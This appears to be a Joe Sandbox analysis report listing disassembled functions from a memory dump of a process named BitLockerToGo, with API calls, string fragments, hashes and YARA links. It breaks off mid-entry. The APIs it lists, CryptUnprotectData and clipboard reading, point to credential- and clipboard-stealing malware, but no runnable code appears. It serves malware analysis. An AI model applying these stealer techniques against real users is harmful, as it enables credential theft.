Function 00426800 Relevance: 13.4, APIs: 1, Strings: 6, Instructions: 1152COMMON

Download Yara Rule

Strings

P, xrefs: 0042690D
bqB, xrefs: 00427152
InA>, xrefs: 00426A50
;:54, xrefs: 0042683C
InA>, xrefs: 004268A0
SV, xrefs: 00426914

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ;:54$InA>$InA>$P$SV$bqB
API String ID: 0-3637656280
Opcode ID: 1fe632dc048b197257461048574386dac656c9afb9c8ab4459265dd05189564e
Instruction ID: efe4a20678031bc524173eeb0d2e1288ac060935f4558c6973bec6d73e9da576
Opcode Fuzzy Hash: 1fe632dc048b197257461048574386dac656c9afb9c8ab4459265dd05189564e
Instruction Fuzzy Hash: 85821475E04225CFDB04CF68DC816AEB7B2FF4A311F1981A9D941AB391D739E842CB94

Function 0043A2E0 Relevance: 11.6, Strings: 9, Instructions: 302
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:, xrefs: 0043A360
4, xrefs: 0043A5FA
:, xrefs: 0043A5F0
;, xrefs: 0043A35B
;, xrefs: 0043A5EB
5, xrefs: 0043A365
5, xrefs: 0043A5F5
4, xrefs: 0043A36A
;45:;, xrefs: 0043A4AE

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: 4$4$5$5$:$:$;$;$;45:;
API String ID: 2994545307-652432164
Opcode ID: 414e459c7087de9645c8b8ce59185e87ca335c878346ddd6f8f6627d72467155
Instruction ID: addf0e0a9e43655b50f3722aa77c46980bb59a9ddb7554f3fa63e8e44c149d1c
Opcode Fuzzy Hash: 414e459c7087de9645c8b8ce59185e87ca335c878346ddd6f8f6627d72467155
Instruction Fuzzy Hash: 1CB1797624D3808FD3048A38889432FBBD25BDA358F1D4A2EE1D6873D2D679C845C70B

Function 0041D5AF Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 404
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0041D87D

Strings

;:54, xrefs: 0041D5E1, 0041D5F8
r, xrefs: 0041D739
J, xrefs: 0041D70E

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: ;:54$J$r
API String ID: 834300711-2889753551
Opcode ID: b8fbcdff2cf27d6daa97ffa3dab79fbbf3af2ef6e8a916c70c28e25c9d54df8d
Instruction ID: 1e6a48387384232ca1d9aaf70156626af773b6e64c63cef5257967e80691cf26
Opcode Fuzzy Hash: b8fbcdff2cf27d6daa97ffa3dab79fbbf3af2ef6e8a916c70c28e25c9d54df8d
Instruction Fuzzy Hash: 27D106B5A083409FD724CF24C8917ABB7E1EF96304F04892EE5DA87392D778D941CB96

Function 0042509D Relevance: 6.4, Strings: 5, Instructions: 163
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4, xrefs: 00425118
;, xrefs: 00425109
5, xrefs: 00425113
:, xrefs: 0042510E
e, xrefs: 0042523F

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4$5$:$;$e
API String ID: 0-2923545159
Opcode ID: 5b12d960ce81663e47a52451c92f2583afbc9122485224d79235786964297d22
Instruction ID: 0cedf7e7cd1d950e232752c351dffcc8340dcfd472d1e916278fe38d13089190
Opcode Fuzzy Hash: 5b12d960ce81663e47a52451c92f2583afbc9122485224d79235786964297d22
Instruction Fuzzy Hash: 2761D23260C7D0CFD320CA6898843ABBBD1ABD6324F594A6ED5D5873D2C7798805CB57

Function 00426F82 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 524
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

bqB, xrefs: 00427152
;:54, xrefs: 00426FE8

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ;:54$bqB
API String ID: 0-2071309610
Opcode ID: 263537fe2a8df3ec3f14dcc44ec227b89241fc27fa4e8899ccdf581fb29b93dd
Instruction ID: fa4f063e5c1a2739215ee5b4adf56ea63b9745041435cfc788aeb297095a9e3c
Opcode Fuzzy Hash: 263537fe2a8df3ec3f14dcc44ec227b89241fc27fa4e8899ccdf581fb29b93dd
Instruction Fuzzy Hash: 6BF144B6E01215CFDB04CF68C8817AEB7B2FF89305F298169D905AB391D779D902CB94

Function 004359B7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00435A05
GetSystemMetrics.USER32 ref: 00435A14

Strings

, xrefs: 00435AE8

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 7ebe9ada2b944e2a605cbf6a1b9a2adb3c02393c48b07d7d3b47b36bb3546d83
Instruction ID: af170d9abb170c5f9c5b4b0cc02af21999a26d1706b44f637ddae32c9d32eadc
Opcode Fuzzy Hash: 7ebe9ada2b944e2a605cbf6a1b9a2adb3c02393c48b07d7d3b47b36bb3546d83
Instruction Fuzzy Hash: 275180B4E142048FCB40EFACD98169DBBF0BB49300F10856EE898E7350DB74A945CF96

Function 0042A6D0 Relevance: 2.8, Strings: 2, Instructions: 324
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

;:54, xrefs: 0042A6FC
SJK^, xrefs: 0042A9A3

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: ;:54$SJK^
API String ID: 2994545307-880411129
Opcode ID: ab4ab03e2b18288e9e312e1580256c479d2cae15dc3854d7350d76d8124aff1a
Instruction ID: 4c3ed52f5240e11dbb30997e80ab3b1b1bef4eb7550614397abf3f622dc09320
Opcode Fuzzy Hash: ab4ab03e2b18288e9e312e1580256c479d2cae15dc3854d7350d76d8124aff1a
Instruction Fuzzy Hash: 558168B6B083115BD720AF25EC8172BB7A2EBD1704F59843EEC8187342E678DC16874B

Function 004100C5 Relevance: 2.7, Strings: 2, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

s, xrefs: 0040FDCC
is, xrefs: 0040FDC4

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: is$s
API String ID: 0-4051906996
Opcode ID: 56ec210bef0424d200d284b5c42806d737177ecc343668b735285f6780e7ca3d
Instruction ID: 4059e8d7aa2db9923d245720d14622c459e410fce01df62e9fe676a51f67d3ff
Opcode Fuzzy Hash: 56ec210bef0424d200d284b5c42806d737177ecc343668b735285f6780e7ca3d
Instruction Fuzzy Hash: 5A61F175608391DFD3148F60E8A062BB7B6FF86315F04893CE985972A0E7759D05CB86

Function 00440D90 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(004440E0,005C003F,00000002,00000018,?), ref: 00440DBE

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 00444620 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1809f67a4ef932cae9d2075131772e341083116ed61cd3a2f8e9030243f46171
Instruction ID: bfefb51553363113ac95e88a8bca032daeb3f9e79fd2476f2037116771111e0d
Opcode Fuzzy Hash: 1809f67a4ef932cae9d2075131772e341083116ed61cd3a2f8e9030243f46171
Instruction Fuzzy Hash: 2C8169396083419BE714DF18D890A3BB7E2EFDA750F19842EE9858B361EB38DC41C756

Function 004441F0 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 03a99d87a2b41afe7c87664c657482e911ea18831468bda48fd0c6a37a8fb2b2
Instruction ID: 3fa07f6db641d71a0473f50ea65704cafb772fe890b3affdcce6dfd07b14b487
Opcode Fuzzy Hash: 03a99d87a2b41afe7c87664c657482e911ea18831468bda48fd0c6a37a8fb2b2
Instruction Fuzzy Hash: 26414636704300AFE7148B599CC1B3B77A6AFD9B04F19402EEA815B7A1D6B5EC048789

Function 004413D5 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c50a3ff0d1de7391cf4100277f546ca23f53629a5a530595b00d458c2c75fd9
Instruction ID: 8c003f9823dd69ea712ad3b12e21b48027cbc909d67c67ab34576fa10d6e70ee
Opcode Fuzzy Hash: 4c50a3ff0d1de7391cf4100277f546ca23f53629a5a530595b00d458c2c75fd9
Instruction Fuzzy Hash: B8212B796083109FE3149F1884D057773A1EB9B329F15163ED592573B2C338AC85DB5E

Function 0044137E Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8d17ee3c5b0249c4511545cef8028621f6b40edad453890fbf9e24c95996764
Instruction ID: f199c747c52a9adc49da1807b431ea695ec0528af7265f3209bd91b7ed0bd343
Opcode Fuzzy Hash: c8d17ee3c5b0249c4511545cef8028621f6b40edad453890fbf9e24c95996764
Instruction Fuzzy Hash: 1801D6386142409BE758DF25D8D18377352E79B358F24193ED193872B1C334A845CB1E

Function 0040D0B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 0040D165
ShellExecuteW.SHELL32(00000000,81368735,00448050,?,00000000,00000005), ref: 0040D249
GetForegroundWindow.USER32(?,00000000,00000005), ref: 0040D24F
GetCurrentProcessId.KERNEL32(?,00000000,00000005), ref: 0040D259
ExitProcess.KERNEL32 ref: 0040D279

Strings

ps, xrefs: 0040D1C4

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: CurrentProcess$ExecuteExitForegroundShellThreadWindow
String ID: ps
API String ID: 1013327911-2817149839
Opcode ID: 395947aa4596a6fdbf01b6e5e31911d6bd80a891b54674111b2221b4422230a7
Instruction ID: 802e53b9b5d3fab858b8c0f51e2b6f1987ae4d254ae5757ddd4a7fa400bb7844
Opcode Fuzzy Hash: 395947aa4596a6fdbf01b6e5e31911d6bd80a891b54674111b2221b4422230a7
Instruction Fuzzy Hash: D14108316183408BE714AB75981536FBBD69FC6314F158D2EE4C1EB2D2CE78C40A8B5A

Function 00440CC0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 79
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000,00000000), ref: 00440D59

Strings

RD, xrefs: 00440D3D

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID: RD
API String ID: 1279760036-1416026120
Opcode ID: f9da6b5eb551a4eb3825273e23e17b74b074d4dcce33d7eb076d9db6a9fcfe30
Instruction ID: 917b482b4b1a8382910e40b870116946ac0ab3381335ac39e00a72b089b8d08d
Opcode Fuzzy Hash: f9da6b5eb551a4eb3825273e23e17b74b074d4dcce33d7eb076d9db6a9fcfe30
Instruction Fuzzy Hash: A1018E71D19212CBE314AF75EC8492BBBA5FFCA341F18487DE48057211E634AC19C3EA

Function 00440F20 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 00440F76

Strings

2123, xrefs: 00440F62

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: ForegroundWindow
String ID: 2123
API String ID: 2020703349-208623094
Opcode ID: b210a30273bb33dd53bdeff02939b666426f70206f57e02b163fddc4f9f8c158
Instruction ID: dd62e8bd2cb4611141040fdff5c29f2e00b613cfc95a5b2aa94b2229cd067ee0
Opcode Fuzzy Hash: b210a30273bb33dd53bdeff02939b666426f70206f57e02b163fddc4f9f8c158
Instruction Fuzzy Hash: CFF028795082804BF310DB29D84122677A1E782319F04893EE5D1C3391C738C9058B0B

Function 004107F7 Relevance: 2.6, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 004107F9
CoInitialize.OLE32(00000000), ref: 00410900

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 81c31d750177ce146e8527366045329e95e1cd398779ef2311c2f0a71d9e51a1
Instruction ID: abed82b44eab5e0305b69bf0d3f998583154d3816c8cbfe6d220a5d9129a85a7
Opcode Fuzzy Hash: 81c31d750177ce146e8527366045329e95e1cd398779ef2311c2f0a71d9e51a1
Instruction Fuzzy Hash: 3A319CF4C10B40AFD770AF3D9A0B6167EB4AB06650F504B1DF8E6966D4E330A4198BD7

Function 0040E1C0 Relevance: 1.6, APIs: 1, Instructions: 90
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(611D67ED,00000000,E3E2F9E0), ref: 0040E286

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f354ed4ba6b11e7200a9c2819eeba715480492adbba85cd9ccd0d76fe460f61b
Instruction ID: d211cc36a776a4650d6a25cec4ad6f3432bf0b80887fe1339dfabb32a98ff728
Opcode Fuzzy Hash: f354ed4ba6b11e7200a9c2819eeba715480492adbba85cd9ccd0d76fe460f61b
Instruction Fuzzy Hash: 86214478508380DBD314DF26ED426AF7BA1FBD6304F448C7EE18467253E739490A87AA

Function 0043DC40 Relevance: 1.5, APIs: 1, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 0043DCCD

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a0f17913f2525a0e0f8ffefbac48ff117ce078390c367a85a56a825d6d9baac1
Instruction ID: 9a37441ecb8038b1869d6f0b088ecbbae8f0e36ee8fdc8f39d9be2bbcf67dc69
Opcode Fuzzy Hash: a0f17913f2525a0e0f8ffefbac48ff117ce078390c367a85a56a825d6d9baac1
Instruction Fuzzy Hash: 470197BB65C3584FC7006F91EC986A6BBA4EFD1304F04403DD68046742DAFB6919C742

Function 00431859 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004318A4

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 4d478e6bdddb855f0a42b4350af7a0d5259f94e12a6cec9b326f29541d1672a7
Instruction ID: 3c9e977c450c4f135c35c7a6bcfc28f59b32f7b5f649b834322db586f9a604c7
Opcode Fuzzy Hash: 4d478e6bdddb855f0a42b4350af7a0d5259f94e12a6cec9b326f29541d1672a7
Instruction Fuzzy Hash: E9F074B12097029FE311DF65C5A574BBBE5BB81304F10891CE4E54B290C7B9A6498FC2

Function 00434A7F Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00434AC3

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: dd8744f0049f0022a9c290567ed1ddad564596e0051cb20ad7bad07382e971d4
Instruction ID: c572d4cf98657ec48b104726610bbd336e2b736b7c73d1d011650ea931ce08df
Opcode Fuzzy Hash: dd8744f0049f0022a9c290567ed1ddad564596e0051cb20ad7bad07382e971d4
Instruction Fuzzy Hash: A8F022B450D341DFE721DF29C5A871ABBE0BB85344F118A1CE4988B290D7B995498F82

Function 00440F68 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00440F76

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 13940e78a7961238caf54405e98899f048eea334418077796825dba2beec2cee
Instruction ID: 1d22e8fd700c48bebeffbf26d2c2cf474de0d3d9f3e244df8e013e987bfa5a4a
Opcode Fuzzy Hash: 13940e78a7961238caf54405e98899f048eea334418077796825dba2beec2cee
Instruction Fuzzy Hash: 04E08C7D6102408FE604DF25EC9142537A4F70B20A700083EE583D3362DF35E640CB0A

Function 0043A952 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043A965

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 677f9b71905706cf16ce5804c70032b7d76d069880a4bf33d681318f7dfbb6f8
Instruction ID: 08e963fcd4019adc8e60d466b8283255b1915ff9cc04a16a63baa1f472e6b219
Opcode Fuzzy Hash: 677f9b71905706cf16ce5804c70032b7d76d069880a4bf33d681318f7dfbb6f8
Instruction Fuzzy Hash: A8D09234381700ABE2318B14EC56F15B3A1BB4AF02F204458F7866F9E0CAF1BA118B08

Function 0043DC18 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,00000000), ref: 0043DC24

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 523f707672c80aeae4c87f4b2abdfa20849dd833f8c33325c04bbf3597a922fb
Instruction ID: ca62b0fe6bc361b8fe52465035c8e03aaa158e12bb5b8da0d05e115494f84301
Opcode Fuzzy Hash: 523f707672c80aeae4c87f4b2abdfa20849dd833f8c33325c04bbf3597a922fb
Instruction Fuzzy Hash: 46B01234146110B8D03117120CC5FFFAD7CBF43F99F102014B204240C00754A001D07D

Non-executed Functions

Function 004386FE Relevance: 66.6, Strings: 53, Instructions: 390COMMON

Download Yara Rule

Strings

v, xrefs: 0043884C
*, xrefs: 00438B7E
-, xrefs: 004389DA
7, xrefs: 004389C2
%, xrefs: 00438B7A
?, xrefs: 00438B52
r, xrefs: 00438876
P, xrefs: 0043893A
/, xrefs: 0043877A
U, xrefs: 00438972
Q, xrefs: 00438814
Q, xrefs: 0043892C
N, xrefs: 004388CA
+, xrefs: 004389D2
E, xrefs: 00438884
5, xrefs: 004389BA
F, xrefs: 004388F4
V, xrefs: 00438964
), xrefs: 004389CA
!, xrefs: 004389EA
j, xrefs: 00438948
=, xrefs: 00438B5A
!, xrefs: 00438B6A
+, xrefs: 00438B82
`, xrefs: 004387F8
/, xrefs: 004389E2
1, xrefs: 004389AA
%, xrefs: 004389FA
3, xrefs: 004389B2
e, xrefs: 0043885A
h, xrefs: 004387DC
@, xrefs: 004388E6
4, xrefs: 00438C3E
k, xrefs: 004387EA
V, xrefs: 004389C6
=, xrefs: 0043899A
#, xrefs: 004389F2
#, xrefs: 00438B62
', xrefs: 00438B72
t, xrefs: 00438910
@, xrefs: 004389EE
K, xrefs: 0043883E
K, xrefs: 00438A2E
i, xrefs: 00438830
;, xrefs: 00438992
U, xrefs: 004388D8
', xrefs: 00438A02
9, xrefs: 00438B4A
M, xrefs: 00438868
?, xrefs: 004389A2
_, xrefs: 0043891E
9, xrefs: 00438987
;:54, xrefs: 00438C6B

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: !$!$#$#$%$%$'$'$)$*$+$+$-$/$/$1$3$4$5$7$9$9$;$;:54$=$=$?$?$@$@$E$F$K$K$M$N$P$Q$Q$U$U$V$V$_$`$e$h$i$j$k$r$t$v
API String ID: 2994545307-164515761
Opcode ID: 2ee731808fd47ece29e23e70d152e7394c8b544f1fc20b6d3152bd5b9db911ba
Instruction ID: 74ddcb10533ea9c577bbf3802a29f84f8dcd438471be7e6cf398ce96439bd5db
Opcode Fuzzy Hash: 2ee731808fd47ece29e23e70d152e7394c8b544f1fc20b6d3152bd5b9db911ba
Instruction Fuzzy Hash: C0224F219087E98DDB22C67C8C087CDBFA11B67324F1843D9D4E96B3D2C7750A86CB66

Function 00435210 Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 120clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00435220
GetWindowLongW.USER32 ref: 0043524D
GetClipboardData.USER32 ref: 0043525D
CloseClipboard.USER32 ref: 0043539E

Strings

V, xrefs: 004352E4
X, xrefs: 004352F3
K, xrefs: 004352EE
L, xrefs: 00435307
_, xrefs: 004352D0
Y, xrefs: 004352E9
], xrefs: 004352D5
V, xrefs: 004352DF
N, xrefs: 004352FD
Y, xrefs: 004352DA
q, xrefs: 004352CB
I, xrefs: 00435302

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: Clipboard$CloseDataLongOpenWindow
String ID: I$K$L$N$V$V$X$Y$Y$]$_$q
API String ID: 1647500905-2073889574
Opcode ID: 3d708e7702e4bf70994ea5c2850c4c62ff3c90e47989a721377a01ee830012d2
Instruction ID: 5f54679d46b1477f2188d147cccf107156d33419d86dcd770f9b8ea5c9be5ebf
Opcode Fuzzy Hash: 3d708e7702e4bf70994ea5c2850c4c62ff3c90e47989a721377a01ee830012d2
Instruction Fuzzy Hash: 59419F7150C781CFE300AF78D48836FBFD0AB96358F04486EE9C986382D6BD8548876B

Function 00427CD2 Relevance: 30.7, Strings: 24, Instructions: 728COMMON

Download Yara Rule

Strings

t)i+, xrefs: 00428004
XY, xrefs: 00428560
TeVg, xrefs: 00428B17
's7u, xrefs: 00427E65
)A-C, xrefs: 00428046
HyJ{, xrefs: 00428B1F
n9_;, xrefs: 00428030
Eq, xrefs: 00428555
'UvW, xrefs: 0042807D
2w0i, xrefs: 00427E70
9), xrefs: 00428396
}z, xrefs: 0042856B
53, xrefs: 004283A1
j%r', xrefs: 00427FF9
Y-\/, xrefs: 0042800F
N=M?, xrefs: 0042803B
Z5B7, xrefs: 00428025
<&, xrefs: 0042838B
DK, xrefs: 00428872
pq, xrefs: 00428B35
u, xrefs: 0042876A
;:54, xrefs: 00428980
B1W3, xrefs: 0042801A
/]-_, xrefs: 00428093

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 'UvW$'s7u$)A-C$/]-_$2w0i$53$9)$;:54$<&$B1W3$DK$Eq$HyJ{$N=M?$TeVg$XY$Y-\/$Z5B7$j%r'$n9_;$pq$t)i+$u$}z
API String ID: 0-458764563
Opcode ID: a38818ec7f6b34250d772dde533ee191c9e597cac88cfd31ab1f3f469572378a
Instruction ID: 74f752fef6289c6a5c4e26b3282c1b7821dc447c468db8a33171137277301699
Opcode Fuzzy Hash: a38818ec7f6b34250d772dde533ee191c9e597cac88cfd31ab1f3f469572378a
Instruction Fuzzy Hash: 68724DB45093818AE334CF15E880B9FBBE1BBD2344F54892DE5D99B261DB74804ACF97

Function 0041F510 Relevance: 24.0, Strings: 18, Instructions: 1543COMMON

Download Yara Rule

Strings

123X, xrefs: 0041F7FE
5670, xrefs: 0041F7F3
=n=c, xrefs: 0041F7DD
H, xrefs: 0041FA0F
!by*, xrefs: 0041F809
sDK}, xrefs: 0041F81F
`abc, xrefs: 0041F9A1
eyv, xrefs: 0042096D
\]^_, xrefs: 0041F9EE
vv@, xrefs: 0041FA77, 0041FA88
Xqrs, xrefs: 0041F975
1X74, xrefs: 0041F7E8
)*+$, xrefs: 0041F814
PQRS, xrefs: 0041F9CD
45, xrefs: 0041FC18
$, xrefs: 0041F622
, xrefs: 0042003E
;:54, xrefs: 0041FFAB

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
